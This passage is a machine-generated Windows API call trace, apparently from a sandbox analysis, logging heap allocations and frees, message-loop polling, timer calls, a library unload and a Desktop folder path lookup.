HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0181.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0181.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0181.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0181.606] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0181.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0181.607] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0181.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0181.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0181.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0181.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0181.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0181.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0181.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0181.607] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0181.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0181.607] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0181.607] FreeLibrary (hLibModule=0x756e0000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0181.607] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0181.607] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0181.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0181.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.608] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0181.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0181.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0181.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0181.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0181.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.608] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0181.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0181.608] CloseHandle (hObject=0x2d0) returned 1 [0181.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0181.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0181.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0181.610] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0181.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0181.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0181.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0181.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0181.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0181.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0181.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0181.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0181.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0181.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0181.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0181.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0181.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0181.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0181.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0181.611] CloseHandle (hObject=0x2a0) returned 1 [0181.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0181.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0181.713] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0181.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0181.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0181.752] TranslateMessage (lpMsg=0x8cf708) returned 0 [0181.752] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0181.752] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0181.752] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0181.752] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0181.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0181.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0181.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0181.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0181.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0181.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0181.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0181.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe55020 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0181.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0181.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0181.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0181.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0181.762] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0181.762] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0181.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0181.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0181.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0181.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 